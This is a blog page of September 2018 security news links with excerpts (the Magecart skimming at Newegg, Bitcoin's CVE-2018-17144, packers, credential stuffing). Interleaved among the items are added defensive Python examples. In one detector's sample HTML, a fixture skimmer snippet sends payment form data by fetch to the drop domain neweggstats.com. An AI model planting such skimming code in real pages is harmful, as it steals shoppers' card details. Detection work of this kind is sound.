Cyber Security September 2018

This posting is here to collect security alert news in September 2018.

I post links to security vulnerability news in the comments of this article.


493 Comments

  1. Tomi Engdahl says:

    Click It Up: Targeting Local Government Payment Portals
    https://www.fireeye.com/blog/threat-research/2018/09/click-it-up-targeting-local-government-payment-portals.html

    FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses.

    In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign.

    On June 15, 2018, Superion released a statement describing their proactive notification to affected customers,

    Reply
  2. Tomi Engdahl says:

    This Windows file may be secretly hoarding your passwords and emails
    https://www.zdnet.com/article/this-windows-file-may-be-secretly-hoarding-your-passwords-and-emails/

    A little-known Windows feature will create a file that stores text extracted from all the emails and plaintext-files found on your PC, which sometimes may reveal passwords or private conversations.

    Reply
  3. Tomi Engdahl says:

    Equifax fined £500,000 over customer data breach
    https://www.zdnet.com/article/equifax-fined-500000-over-customer-data-breach/

    If the security incident had taken place after GDPR came into play, the fine may have been far higher.

    Equifax has been issued a £500,000 fine after a catastrophic data breach in 2017 led to the compromise of data belonging to up to 15 million UK citizens.

    The credit monitoring service experienced a data breach last year in which 146 million records were stolen. Customers worldwide were affected, with the majority living in the United States.

    The information exposed due to lax security practices included names, dates of birth, addresses, phone numbers, driver’s license details, Social Security numbers, and credit card data.

    Reply
  4. Tomi Engdahl says:

    Newegg Credit Card Info Stolen For a Month by Injected MageCart Script
    https://www.bleepingcomputer.com/news/security/newegg-credit-card-info-stolen-for-a-month-by-injected-magecart-script/

    The malicious credit-card-stealing MageCart script behind the British Airways and Feedify breaches has struck again, but this time against Newegg, one of the largest online technology retailers.

    Two reports released today by RiskIQ and Volexity detail how the MageCart script has been injected into the Newegg site for a little over a month while quietly stealing customers’ payment information.

    According to the reports, the attackers created a domain called neweggstats.com on August 13th. This domain was used as a drop site that collected credit card details stolen from Newegg’s site. Volexity further stated that the attacks then went live on Newegg’s site around August 16th.

    As Newegg is one of the largest online retailers of technology components, computers, and hardware, the amount of victims affected by this breach can be quite large.

    “With the size of the business evaluated at $2.65 billion in 2016, Newegg is an extremely popular retailer,” security researcher Yonathan Klijnsma stated in RiskIQ blog post about this attack. “Alexa shows that Newegg has the 161st most popular site in the U.S. and Similarweb, which also gathers information on site visits, estimates Newegg receives over 50 million visitors a month.”

    Another Victim of the Magecart Assault Emerges: Newegg
    https://www.riskiq.com/blog/labs/magecart-newegg/

    While the dust is settling on the British Airways compromise, the Magecart actor behind it has not stopped their work, hitting yet another large merchant: Newegg.

    Reply
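A first check a site owner can run for the kind of injection described in the Newegg item, as an added example that is not part of the original post nor of the RiskIQ or Volexity reports: parse a checkout page's HTML, list every external script host and every host an inline script talks to, and flag anything outside an allowlist. The page HTML, the shop and CDN hostnames and the allowlist below are constructed for the example; the only real name in it is the drop domain neweggstats.com, which the reports identify.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Constructed sample: a checkout page with one first-party script, one CDN script,
# and an injected skimmer that posts the payment form to the drop site.
SAMPLE_HTML = """
<html><head>
<script src="https://www.example-shop.test/js/checkout.js"></script>
<script src="https://cdn.example-cdn.test/lib/jquery.min.js"></script>
</head><body>
<form id="payment"><input name="cc"><input name="cvv"></form>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = new FormData(document.getElementById('payment'));
  fetch('https://neweggstats.com/GlobalData/', {method: 'POST', body: d});
});
</script>
</body></html>
"""

# Hosts the site owner expects to see (assumed for the example).
ALLOWED_HOSTS = {"www.example-shop.test", "cdn.example-cdn.test"}

class ScriptCollector(HTMLParser):
    """Collect external script sources and the bodies of inline scripts."""
    def __init__(self):
        super().__init__()
        self.external = []      # src attribute of each <script src=...>
        self.inline = []        # text of each <script> without src
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True

    def handle_data(self, data):
        # HTMLParser hands script content to handle_data as raw text
        if self._in_inline:
            self.inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def audit_scripts(html, allowed_hosts):
    """Return the set of hosts that scripts are loaded from, or that inline
    scripts reference by URL, which are not in the allowlist."""
    p = ScriptCollector()
    p.feed(html)
    suspicious = set()
    for src in p.external:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            suspicious.add(host)
    for body in p.inline:
        for host in URL_RE.findall(body):
            if host not in allowed_hosts:
                suspicious.add(host)
    return suspicious

if __name__ == "__main__":
    print(sorted(audit_scripts(SAMPLE_HTML, ALLOWED_HOSTS)))   # ['neweggstats.com']
```

This inspects a snapshot of the page only; a skimmer served from a first-party path, or one that builds its drop URL from string fragments, would not show up. A Content Security Policy with strict `script-src` and `connect-src` allowlists makes the browser enforce the same rule on every load, which is the durable fix.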
  5. Tomi Engdahl says:

    This Toy Can Open Any Garage
    https://www.youtube.com/watch?v=CNodxp9Jy4A

    Or almost any garage – it’s particularly good with fixed code gates and garages. Samy proposes other weaknesses with rolling codes.

    “Opens the door to other issues..” ;-)

    Reply
  6. Tomi Engdahl says:

    They’re Drinking Your Milkshake: CTA’s Joint Analysis on Illicit Cryptocurrency Mining
    https://www.cyberthreatalliance.org/joint-analysis-on-illicit-cryptocurrency-mining/

    Reply
  7. Tomi Engdahl says:

    Extended Validation Certificates are Dead
    https://www.troyhunt.com/extended-validation-certificates-are-dead/

    That’s it – I’m calling it – extended validation certificates are dead. Sure, you can still buy them (and there are companies out there that would just love to sell them to you!), but their usefulness has now descended from “barely there” to “as good as non-existent”. This change has come via a combination of factors including increasing use of mobile devices, removal of the EV visual indicator by browser vendors and as of today, removal from Safari on iOS (it’ll also be gone in Mac OS Mojave when it lands next week)

    Reply
  8. Tomi Engdahl says:

    NSO Group Rejects Citizen Lab’s Findings on Pegasus Operations
    https://www.bleepingcomputer.com/news/security/nso-group-rejects-citizen-labs-findings-on-pegasus-operations/

    A report released today about the activity of Pegasus spyware presents evidence of the tool’s use outside the ethical boundaries publicized by its maker.

    Pegasus is a known spyware tool developed by Israel-based company NSO Group. It falls into the category of surveillance tools “that are licensed to legitimate government agencies for the sole purpose of investigating crime and terror.”

    The spyware has been the topic of many discussions over the years, mainly because it was found targeting journalists, lawyers and human rights activists considered a threat by the government of their country.

    Reply
  9. Tomi Engdahl says:

    Cybersecurity firm: More Iran hacks as US sanctions loomed
    https://apnews.com/88ab2debee36432d8d0498991e9f5768

    Reply
  10. Tomi Engdahl says:

    Crippling DDoS vulnerability put the entire Bitcoin market at risk
    This could have been waaaaay worse
    https://thenextweb.com/hardfork/2018/09/20/bitcoin-core-vulnerability-blockchain-ddos/

    The entire Bitcoin infrastructure has been issued with a stern warning: update Bitcoin Core software or risk having the whole thing collapse. Until now, Bitcoin miners could have brought down the entire blockchain by flooding full node operators with traffic, via a Distributed Denial-of-Service (DDoS) attack.

    “A denial-of-service vulnerability (CVE-2018-17144) exploitable by miners has been discovered in Bitcoin Core versions 0.14.0 up to 0.16.2.” the patch notes state. “It is recommended to upgrade any of the vulnerable versions to 0.16.3 as soon as possible.”

    As far as the attack vector in question goes, there’s a catch: anyone ballsy enough to try to bring down Bitcoin would have to sacrifice almost $80,000 worth of Bitcoin in order to do it.

    The bug relates to its consensus code.

    only those willing to disregard block reward of 12.5BTC ($80,000) could actually do any real damage.

    Reply
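The Bitcoin Core notice for CVE-2018-17144 concerns a block containing a transaction that spends the same previous output twice; the per-transaction duplicate-input check that catches this was skipped during block validation in the affected versions. The following is an added example, not Bitcoin Core's code: a toy validator with constructed transaction structures and reject strings chosen to resemble Bitcoin Core's, showing where the check sits and why a block that fails it is rejected (and its 12.5 BTC reward forfeited, which is the cost the article cites) rather than crashing the node.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# (txid, output index) of the previous output that an input spends
OutPoint = Tuple[str, int]

@dataclass
class Tx:
    txid: str
    inputs: List[OutPoint]
    outputs: List[int] = field(default_factory=list)  # output values in satoshi
    coinbase: bool = False

class ConsensusError(Exception):
    """Carries a short rejection reason (strings modelled on Bitcoin Core's)."""

def check_transaction(tx: Tx) -> None:
    """Context-free sanity checks on one transaction.
    The duplicate-input loop is the check the affected versions skipped
    during block validation; without it a transaction spending one
    outpoint twice reaches the UTXO update step."""
    if not tx.inputs and not tx.coinbase:
        raise ConsensusError("bad-txns-vin-empty")
    if not tx.outputs:
        raise ConsensusError("bad-txns-vout-empty")
    seen = set()
    for op in tx.inputs:
        if op in seen:
            raise ConsensusError("bad-txns-inputs-duplicate")
        seen.add(op)

def validate_block(txs: List[Tx]) -> str:
    """Run the per-transaction checks over a block; return 'ok' or the reject reason."""
    if not txs or not txs[0].coinbase:
        return "bad-cb-missing"
    try:
        for tx in txs:
            check_transaction(tx)
    except ConsensusError as e:
        return str(e)
    return "ok"

def connect_block(txs: List[Tx], utxo: Dict[OutPoint, int]) -> Dict[OutPoint, int]:
    """Apply an already-validated block to a copy of the UTXO set.
    If validate_block were skipped, the second spend of a duplicated outpoint
    would fail the lookup below. The Bitcoin Core notice describes that path
    as an assertion crash in 0.14.x (the denial of service) and, in 0.15.0
    through 0.16.2, as a silent double spend that could have inflated supply."""
    new = dict(utxo)
    for tx in txs:
        if not tx.coinbase:
            for op in tx.inputs:
                if op not in new:
                    raise ConsensusError("bad-txns-inputs-missingorspent")
                del new[op]
        for i, value in enumerate(tx.outputs):
            new[(tx.txid, i)] = value
    return new

if __name__ == "__main__":
    coinbase = Tx("cb", [], [1_250_000_000], coinbase=True)   # 12.5 BTC block reward
    honest = Tx("t1", [("prev", 0)], [1_000])
    doubled = Tx("t2", [("prev", 1), ("prev", 1)], [2_000])   # same coin spent twice
    print(validate_block([coinbase, honest]))    # ok
    print(validate_block([coinbase, doubled]))   # bad-txns-inputs-duplicate
```

The second lookup in connect_block is defence in depth, not a substitute: the cheap structural check in check_transaction runs before any state is touched, which is why its removal as an optimisation was the problem.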
  11. Tomi Engdahl says:

    I’m not exaggerating when I say this scares me. It’s like the “Nosedive” episode of Black Mirror

    Leave no dark corner
    http://mobile.abc.net.au/news/2018-09-18/china-social-credit-a-model-citizen-in-a-digital-dictatorship/10200278?pfmredir=sm

    China is building a digital dictatorship to exert control over its 1.4 billion citizens. For some, “social credit” will bring privileges — for others, punishment.

    A vast network of 200 million CCTV cameras across China ensures there’s no dark corner in which to hide.

    Every step she takes, every one of her actions big or small — even what she thinks — can be tracked and judged.

    What may sound like a dystopian vision of the future is already happening in China. And it’s making and breaking lives.

    The Communist Party calls it “social credit” and says it will be fully operational by 2020.

    Within years, an official Party outline claims, it will “allow the trustworthy to roam freely under heaven while making it hard for the discredited to take a single step”.

    Reply
  12. Tomi Engdahl says:

    Computer System Security Requirements for IRS 1075: What You Need to Know
    https://www.tripwire.com/state-of-security/regulatory-compliance/computer-system-security-requirements-for-irs-1075-what-you-need-to-know/

    The IRS 1075 publication lays out a framework of compliance regulations to ensure federal tax information, or FTI, is treated with adequate security provisioning to protect its confidentiality. This may sound simple enough but IRS 1075 puts forth a complex set of managerial, operational and technical security controls you must continuously follow in order to maintain ongoing compliance.

    Any organization or agency that receives FTI needs to prove that they’re protecting that data properly with IRS 1075 compliance.

    Reply
  13. Tomi Engdahl says:

    Office of the Director of National Intelligence Common Cyber Threat Framework
    September 2, 2018
    https://publicintelligence.net/odni-cyber-threat-framework/

    A Common Cyber Threat Framework: A Foundation for Communication

    Reply
  14. Tomi Engdahl says:

    Encryption bill endorsed by govt party room
    https://itwire.com/government-tech-policy/84562-encryption-bill-endorsed-by-govt-party-room.html

    Barely one week of parliamentary sitting days after the date for comment ended, the Federal Government’s party room has endorsed the contentious encryption bill and it could be introduced into the House of Representatives as early as Thursday.

    “That is to say that once you undermine the fundamental principle of encryption then Australia’s cyber security capabilities will be permanently diminished,” the spokesperson added.

    According to the draft, telecommunications and Internet companies and makers of digital devices will face fines of up to $10 million if they do not help law enforcement agencies gain access to data needed for investigating terrorism offences.

    Individuals will face fines of up to $50,000.

    Companies will be initially requested to co-operate with law enforcement; if they do not, the pressure will be stepped up to force them to help.

    First, there will be a “technical assistance request” that allows voluntary help by a company. The staff of the company will be given civil immunity from prosecution.

    Reply
  15. Tomi Engdahl says:

    Report: Financial industry in crosshairs of credential-stuffing botnets
    https://securityledger.com/2018/09/report-financial-industry-in-crosshairs-of-credential-stuffing-botnets/

    Botnets mounting credential-stuffing attacks against the financial industry are on the rise, with a more than 20-percent uptick in a two-month period, a new report from Akamai has found.

    Bad actors from the United States, Russia and Vietnam are using credential stuffing attacks to try to compromise financial services firms, Akamai says in its latest State of the Internet report.

    Reply
  16. Tomi Engdahl says:

    Catalin Cimpanu / ZDNet:
    China-based Huazhu Hotels Group says hacker who was selling 141.5GB data on millions of its guests and tried to blackmail the chain, has been arrested

    Chinese police arrest hacker who sold data of millions of hotel guests on the dark web
    https://www.zdnet.com/article/chinese-police-arrest-hacker-who-sold-data-of-millions-of-hotel-guests-on-the-dark-web/

    Hacker was selling 141.5GB of data from Huazhu Hotels Group. He also attempted to blackmail the hotel chain to pay for its own data.

    Reply
  17. Tomi Engdahl says:

    Worried About Privacy? 5 Alternatives to Google Maps
    https://www.eeweb.com/profile/max-maxfield/articles/if-youre-worried-about-privacy-here-are-five-alternatives-to-google-maps

    It seems that Google continues to track where you are even if the location tracking is switched off. Are you thrilled, troubled, or terrified by what the future holds?

    Are you worried about erosions to your privacy in this connected age? To be honest, I oscillate back and forth on this issue. I also fear that there’s not much that we can do about it.

    Reply
  18. Tomi Engdahl says:

    Increased Use of a Delphi Packer to Evade Malware Classification
    https://www.fireeye.com/blog/threat-research/2018/09/increased-use-of-delphi-packer-to-evade-malware-classification.html

    The concept of “packing” or “crypting” a malicious program is widely popular among threat actors looking to bypass or defeat analysis by static and dynamic analysis tools. Evasion of classification and detection is an arms race in which new techniques are traded and used in the wild. For example, we observe many crypting services being offered in underground forums by actors who claim to make any malware “FUD” or “Fully Undetectable” by anti-virus technologies, sandboxes and other endpoint solutions. We also see an increased effort to model normal user activity and baseline it as an effective countermeasure to fingerprint malware analysis environments.

    Reply
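A coarse but widely used triage heuristic for the packed and crypted samples the FireEye post describes, as an added example that is not FireEye's code: compute Shannon entropy over fixed-size chunks of a section or file. Compressed or encrypted payloads sit close to 8 bits per byte, while ordinary code and text sit well below. The byte buffers, the chunk size and the thresholds are constructed for this example; a deterministic SHA-256 stream stands in for a crypted section.

```python
import hashlib
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or single-valued data, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def chunk_entropies(data: bytes, chunk: int = 1024):
    """Entropy of each consecutive chunk; 1 KiB keeps the sampling bias small."""
    return [shannon_entropy(data[i:i + chunk]) for i in range(0, len(data), chunk)]

def looks_packed(data: bytes, threshold: float = 7.0, min_fraction: float = 0.5) -> bool:
    """Flag a buffer when at least min_fraction of its chunks exceed the threshold.
    Thresholds are assumptions for the example; tune them on your own corpus."""
    ents = chunk_entropies(data)
    if not ents:
        return False
    high = sum(1 for e in ents if e >= threshold)
    return high / len(ents) >= min_fraction

def pseudo_random_bytes(n: int, seed: bytes = b"example") -> bytes:
    """Deterministic high-entropy stream: a constructed stand-in for a crypted section."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])

# Constructed sections: repetitive text versus a crypted-looking blob.
PLAIN_SECTION = b"Delphi loader stub text " * 300
CRYPTED_SECTION = pseudo_random_bytes(8192)

if __name__ == "__main__":
    for name, data in (("plain", PLAIN_SECTION), ("crypted", CRYPTED_SECTION)):
        ents = chunk_entropies(data)
        print(f"{name}: min {min(ents):.2f} max {max(ents):.2f} packed={looks_packed(data)}")
```

Entropy alone is a triage signal, not a verdict: legitimate installers and binaries with embedded compressed resources score high, and a packer whose stub is deliberately built to resemble a normal Delphi program, as the post discusses, keeps its unpacking code looking ordinary even though the payload section still stands out. Pair the score with section names, import counts and the presence of a recognised packer stub before drawing conclusions.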
  19. Tomi Engdahl says:

    NSS Labs sues antivirus toolmakers, claims they quietly conspire to evade performance tests
    Alleges CrowdStrike, Symantec, ESET, Anti-Malware Testing Standards Org collusion
    https://www.theregister.co.uk/2018/09/20/security_testing_contratemps/

    NSS Labs has thrown a hand grenade into the always fractious but slightly obscure world of security product testing – by suing multiple vendors as well as an industry standards organisation.

    Its lawsuit, filed in California this week against CrowdStrike, Symantec, ESET, and the Anti-Malware Testing Standards Organization (AMTSO), has alleged no less than a conspiracy to cover up deficiencies in security tools.

    These vendors not only knew of bugs in their code and failed to act, but they were “actively conspiring to prevent independent testing that uncovers those product deficiencies,” NSS Labs claimed. The lawsuit hopes to illuminate bad practices that harm consumers, Vikram Phatak, chief exec of NSS Labs, claimed in a statement.

    NSS Labs vs. CrowdStrike, Symantec, ESET and the Anti-Malware Testing Standards Organization
    https://www.nsslabs.com/blog/company/advancing-transparency-and-accountability-in-the-cybersecurity-industry/

    Advancing Transparency and Accountability in the Cybersecurity Industry

    Reply
  20. Tomi Engdahl says:

    U.S. Takes Off the Gloves in Global Cyber Wars: Top Officials
    https://www.securityweek.com/us-takes-gloves-global-cyber-wars-top-oficials

    The United States is taking off the gloves in the growing, shadowy cyber war waged with China, Russia and other rivals, a top White House official said Thursday.

    National Security Advisor John Bolton said the country’s “first fully articulated cyber strategy in 15 years” was now in effect.

    The new more aggressive posture follows a decision by President Donald Trump to revoke rules established by his predecessor Barack Obama to require high-level authority for any big military cyber operations.

    “Our hands are not tied as they were in the Obama administration,” Bolton said.

    “For any nation that’s taking cyber activity against the United States, they should expect… we will respond offensively, as well as defensively,” Bolton said.

    “Not every response to a cyber attack would be in the cyber world,” he added.

    Reply
  21. Tomi Engdahl says:

    Japan Digital Currency Exchange Hacked, Losing $60 Million
    https://www.securityweek.com/japan-digital-currency-exchange-hacked-losing-60-million

    TOKYO (AP) — Hackers have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from a Japanese digital currency exchange, the operators said Thursday.

    Tech Bureau Corp. said a server for its Zaif exchange was hacked for two hours last week, and some digital currencies got unlawfully relayed from what’s called a “hot wallet,” or where virtual coins are stored at such exchanges.

    Reply
  22. Tomi Engdahl says:

    China Arrests Suspect for Customer Data Leak at Accor Partner
    https://www.securityweek.com/china-arrests-suspect-customer-data-leak-accor-partner

    Shanghai police have arrested a man in connection with a data leak at NASDAQ-listed Chinese hotelier Huazhu Group after the suspect failed to sell the information online.

    The 30-year-old suspect had hacked and stolen user data from hotels under Huazhu Group and tried to sell it on overseas websites, the police said in a statement late Wednesday.

    Huazhu, one of China’s biggest hoteliers and the local partner of France-based AccorHotels, had alerted police to reports in August that the company’s internal data was being sold online.

    Huazhu Group said in a statement to the New York stock exchange on Monday that “the suspect also attempted to blackmail Huazhu by leveraging public pressure, without success”.

    The potentially-leaked data included guest membership information, personal IDs, check-in records, guest names, mobile numbers and emails.

    Reply
  23. Tomi Engdahl says:

    Department of Defense Releases New Cyber Strategy
    https://www.securityweek.com/department-defense-releases-new-cyber-strategy

    The U.S. Department of Defense this week released its 2018 cyber strategy, which outlines how the organization plans on implementing the country’s national security and defense strategies in cyberspace.

    The new cyber strategy, which supersedes the 2015 strategy, focuses on the competition with China and Russia, but it also mentions other actors, such as North Korea and Iran. The DoD says China has been “eroding U.S. military overmatch and the Nation’s economic vitality” by stealing information, while Russia has used cyber operations to influence elections.

    Reply
  24. Tomi Engdahl says:

    Unwiped Drives and Servers from NCIX Retailer for Sale on Craigslist
    https://www.bleepingcomputer.com/news/security/unwiped-drives-and-servers-from-ncix-retailer-for-sale-on-craigslist/

    Servers and storage disks filled with millions of unencrypted confidential records of employees, customers and business partners of computer retailer NCIX turned up for sale via a Craigslist advertisement.

    Up until December 1, 2017, when it filed for bankruptcy, NCIX was a privately-held company in Canada in the business of selling computer hardware and software.

    Reply
  25. Tomi Engdahl says:

    COI for SingHealth cyberattack: IT gaps, staff missteps contributed to incident, says Solicitor-General
    https://www.channelnewsasia.com/news/singapore/singhealth-cyberattack-committee-inquiry-staff-hack-10744182

    Reply
  26. Tomi Engdahl says:

    Scottish brewery recovers from ransomware attack
    Trouble ferments after hackers lock system and Arran with it
    https://www.theregister.co.uk/2018/09/21/arran_brewery_ransomware/

    Reply
  27. Tomi Engdahl says:

    Josh Taylor / BuzzFeed:
    Australian Minister for Home Affairs Peter Dutton accused of rushing legislation through parliament that tech companies say would weaken encryption

    While Everyone Was Distracted By Strawberries, Peter Dutton Introduced Laws To Snoop On Your Private Chats
    https://www.buzzfeed.com/joshtaylor/while-everyone-was-distracted-by-strawberries-peter-dutton

    The legislation was introduced into parliament just 10 days after consultation ended, and not all submissions have been made public.

    Home affairs minister Peter Dutton has been accused of rushing legislation that tech companies say could have the effect of weakening encryption, privacy and security of all Australians.

    The legislation if passed would force tech companies to: remove protections on devices, give law enforcement agencies the design specs of their devices, install software on a device when asked, provide access to devices, and help agencies build their own systems.

    The companies that would be most affected by the legislation, including Wickr, Facebook, Google and Amazon had all raised alarms that the requirements for companies to allow law enforcement agencies to exploit weaknesses in encryption to investigate serious crimes could also have the effect in creating vulnerability for law-abiding users, who rely on encryption for security and privacy online.

    Reply
  28. Tomi Engdahl says:

    Apple says it’s tracking your calls and emails to ‘prevent fraud’
    https://nypost.com/2018/09/20/apple-says-its-tracking-your-calls-and-emails-to-prevent-fraud/

    Apple has been advocating for unbreakable encryption and total user privacy for years, even if that put it at odds with governments around the world. That’s not just because it gave it an edge on the competition, forcing rivals to also somewhat embrace encryption and better privacy features, but also because Apple seems to genuinely believe that user data and privacy should be defended at all costs.

    Apple just added a new provision to the iTunes Store & Privacy policy that tells users that their devices will receive individual scores based on the number of phone calls they make and the emails they send

    Reply
  29. Tomi Engdahl says:

    Port of Barcelona Suffers Cyberattack
    https://www.bleepingcomputer.com/news/security/port-of-barcelona-suffers-cyberattack/

    The Port of Barcelona was Thursday morning the target of a cyberattack that affected some of its servers and systems, forcing the organization to launch the contingency plan designed specifically for these incidents.

    Details about the incident are scarce

    a later update on the matter announced that maritime operations had not been affected in any way and all ships were operating within regular parameters

    Premonitory tweet or what?
    In a twist of irony, Port of Barcelona tweeted just two days before the attack that no one is safe from a cyberattack that puts at risk the activity and security of its stakeholders.

    Reply
  30. Tomi Engdahl says:

    Wall Street Journal:
    In letter to Congress, Google confirms it continues to allow third-party apps to scan and share data from Gmail accounts, though Google itself stopped doing so

    Google Says It Continues to Allow Apps to Scan Data From Gmail Accounts
    Lawmakers had asked company to explain policy in wake of WSJ report
    https://www.wsj.com/articles/google-says-it-continues-to-allow-apps-to-scan-data-from-gmail-accounts-1537459989?redirect=amp#click=https://t.co/0KcLZqrgOK

    Reply
  31. Tomi Engdahl says:

    Zack Whittaker / TechCrunch:
    Twitter says it fixed a bug that sent some users’ direct messages from their interactions with business accounts to third-party developers, since May 2017

    Twitter says bug may have exposed some direct messages to third-party developers
    https://techcrunch.com/2018/09/21/twitter-bug-sent-user-direct-messages-to-developers-for-over-a-year/

    Twitter said that a “bug” sent users’ private direct messages to third-party developers “who were not authorized to receive them.”

    “The issue has persisted since May 2017, but we resolved it immediately upon discovering it,” the message said, which was posted on Twitter by a Mashable reporter. “Our investigation into this issue is ongoing, but presently we have no reason to believe that any data sent to unauthorized developers was misused.”

    https://twitter.com/karissabe/status/1043204939026071552

    Reply
  32. Tomi Engdahl says:

    Catalin Cimpanu / ZDNet:
    Latvian hacker sentenced to 14 years in prison for creating and running Scan4You service that allowed malware authors to check the detection rates of their code — Ruslan Bondars ran a “VirusTotal-for-crooks” operation from 2009 to 2017. — Ruslan Bondars, a 37-year-old man from Latvia …

    Hacker gets a whopping 14 years in prison for running Scan4You service
    Ruslan Bondars ran a “VirusTotal-for-crooks” operation from 2009 to 2017
    https://www.zdnet.com/article/hacker-gets-a-whopping-14-years-in-prison-for-running-scan4you-service/

    Ruslan Bondars, a 37-year-old man from Latvia was sentenced to a whopping 14 years in prison for facilitating cybercrime by creating and running a service named Scan4You that allowed malware authors to check the detection rates of their malicious code.

    In the infosec industry, Scan4You is what security researchers and malware authors refer to as a “counter-anti-virus” or a “no-distribute-scanner.”

    Scan4You works similarly to Google’s legitimate VirusTotal web service, in the way that it aggregates scan engines from multiple antivirus vendors and allows a user to check files against multiple antivirus programs at the same time. The only difference is that Scan4You does not allow the antivirus engines to report results back to vendors, keeping malware detections only for itself.

    Malware authors have been using services like Scan4You for years as a way to test malware before they launch it into real-world campaigns, fine-tuning their code to avoid detections.

    Bondars set up Scan4You on this model in 2009, and it quickly became the most popular service on the market.

    Bondars, too, was eventually arrested in May 2017

    According to court documents, Scan4You was hosted on Amazon Web Services servers, and malware authors had to pay to get full access to the scanner’s features.

    Trend Micro says the hacker was also behind many other criminal activities.

    Reply
  33. Tomi Engdahl says:

    Specops Software:
    Office 365 is a prime target for login attacks — Global survey reveals low adoption of O365 multi-factor authentication (MFA), even though it prevents phishing, and some of the reasons why.
    https://specopssoft.com/our-resources/office-365-survey-report/?utm_source=Sponsored%20post%20-%20O365%20report&utm_campaign=Techmeme

    Reply
  34. Tomi Engdahl says:

    APPLE IS QUIETLY GIVING PEOPLE ‘TRUST SCORES’ BASED ON THEIR IPHONE DATA
    https://www.independent.co.uk/life-style/gadgets-and-tech/news/apple-trust-score-iphone-data-black-mirror-email-phone-fraud-a8546051.html

    iPhone, iPad, Apple Watch and Apple TV data is used to see how trustworthy you are, similar to a scenario in the dystopian series Black Mirror

    said in an update to its privacy policy that the scores would be determined by tracking the calls and emails made on Apple devices.

    In an update to its privacy policy, Apple said the rating system could be used to help fight fraud, though specific examples of how this would work were not given.

    Reply
  35. Tomi Engdahl says:

    Stephen Hiltner / New York Times:
    Defcon attendees say corporate demands, widespread professionalization, and bug bounty programs are reshaping hackers’ attitudes toward privacy and anonymity

    For Hackers, Anonymity Was Once Critical. That’s Changing.
    https://www.nytimes.com/2018/09/22/technology/defcon-hackers-privacy-anonymity.html

    At Defcon, one of the world’s largest hacking conferences, new pressures are reshaping the community’s attitudes toward privacy and anonymity.

    Reply
  36. Tomi Engdahl says:

    eevBLAB #53 – Beware of Trademark Scams
    https://www.youtube.com/watch?v=qp-JyM3wCLg

    Beware of Trademark listing scams that look like official invoices to renew or protect your trademark.

    https://www.ipaustralia.gov.au/trade-marks/managing-your-trade-mark/unsolicited-invoices

    Reply
  37. Tomi Engdahl says:

    Credential Stuffing Attacks Are Reaching DDoS Proportions
    https://www.securityweek.com/credential-stuffing-attacks-are-reaching-ddos-proportions

    Credential stuffing is a growing threat. It is not new, but for many companies it is treated as annoying background noise that can be absorbed by bandwidth, handled by access controls, and ignored. New figures suggest that this is a bad approach.

    Credential stuffing typically uses bots to test many hundreds of thousands of stolen credential pairs against fresh targets. It doesn’t afford a high return for the attacker, but it is a low cost, low risk attack that occasionally hits the jackpot. The attacker is relying on users’ habit of reusing the same password across multiple accounts.

    It isn’t clear exactly where the credentials come from — but there have been dozens of major breaches, hundreds of minor breaches, and an unknown number of unreported breaches over the last few years — and we know that criminals aggregate stolen databases and sell them on. We are usually told that stolen passwords have been hashed; but since credential stuffing can only happen with plaintext passwords, either some of the databases were never hashed, or that hashing is not as secure against cracking as we would like to believe.

    Reply
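Both credential-stuffing items above (the Akamai financial-industry report and the "DDoS proportions" piece) describe bots testing large lists of stolen username/password pairs against a login endpoint. A detection a login service can run over its own authentication log, as an added example that is neither Akamai's nor the articles' code: keep a sliding window per source IP, count how many distinct usernames failed in it, and flag a source that spans many usernames with a success rate near zero. The log format, the two source addresses, the window and the thresholds are all constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def build_sample_log():
    """Constructed auth log lines: '<iso timestamp> <source ip> <username> <OK|FAIL>'.
    One source sprays 30 different usernames in 30 seconds and lands one hit;
    a second source is a real user who mistypes twice and then logs in."""
    base = datetime(2018, 9, 21, 10, 0, 0)
    lines = []
    for i in range(30):
        result = "OK" if i == 29 else "FAIL"
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} 203.0.113.7 user{i:02d} {result}")
    for i, result in enumerate(["FAIL", "FAIL", "OK"]):
        lines.append(f"{(base + timedelta(seconds=40 + 5 * i)).isoformat()} 198.51.100.4 carol {result}")
    return lines

def detect_stuffing(lines, window=timedelta(minutes=5),
                    min_distinct_users=20, max_success_rate=0.05):
    """Flag source IPs whose recent attempts span many distinct usernames with
    almost no successes. Returns {ip: (distinct_failed_users, attempts, successes)}
    for every source that crossed the thresholds, with the figures from the
    last event at which it did. Thresholds are assumptions for the example."""
    recent = defaultdict(deque)      # ip -> deque of (timestamp, username, succeeded)
    flagged = {}
    for line in lines:
        ts_text, ip, user, result = line.split()
        ts = datetime.fromisoformat(ts_text)
        q = recent[ip]
        q.append((ts, user, result == "OK"))
        while q and ts - q[0][0] > window:   # drop events that left the window
            q.popleft()
        failed_users = {u for _, u, ok in q if not ok}
        successes = sum(1 for _, _, ok in q if ok)
        attempts = len(q)
        if len(failed_users) >= min_distinct_users and successes / attempts <= max_success_rate:
            flagged[ip] = (len(failed_users), attempts, successes)
    return flagged

if __name__ == "__main__":
    for ip, (users, attempts, hits) in detect_stuffing(build_sample_log()).items():
        print(f"{ip}: {users} distinct failed users in {attempts} attempts, {hits} successes")
```

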